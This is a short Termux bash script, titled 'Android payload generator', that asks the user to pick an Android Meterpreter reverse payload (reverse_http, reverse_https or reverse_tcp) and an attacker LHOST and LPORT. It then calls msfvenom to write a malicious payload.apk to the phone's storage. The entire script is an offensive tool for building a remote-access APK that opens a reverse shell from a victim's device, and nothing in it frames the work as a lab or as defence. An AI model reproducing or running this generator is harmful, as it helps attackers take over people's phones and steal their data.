#!/data/data/com.termux/files/usr/bin/bash

clear

echo "######################################" |lolcat
echo ""
echo 'Android payload generator ' |lolcat
echo 'Script Created by : Viliyam Vasava' |lolcat
echo ""
echo 'Learn More type  easymux' |lolcat
echo ""
echo "######################################" |lolcat

option=0

while [ $option -ne 13 ]
do
	echo "*** Payload Options ***" |lolcat
	
	echo "1. reverse_http"
	echo "2. reverse_https"
	echo "3. reverse_tcp"

	read -p "Select Payload > " option

	if [ $option -eq 1 ]
	then
		payload="reverse_http"
		option=13
	elif [ $option -eq 2 ]
	then
		payload="reverse_https"
		option=13
	elif [ $option -eq 3 ]
	then
		payload="reverse_tcp"
		option=13
	else
		clear
		echo "Invalid Option."  |lolcat -a
		option=0
	fi

done

echo 'Enter LHOST' |lolcat -a
read host

echo 'Enter LPORT' |lolcat -a
read port

echo "Generating Payload Please Wait..." |lolcat -a

~/metasploit-framework/msfvenom -p android/meterpreter/$payload LHOST=$host LPORT=$port --arch dalvik --platform android R > /sdcard/payload.apk

[ -f /sdcard/payload.apk ] && echo "Payload 'payload.apk' is ready. Check it in your phone storage" |lolcat -a || echo "It seems somthing went wrong"

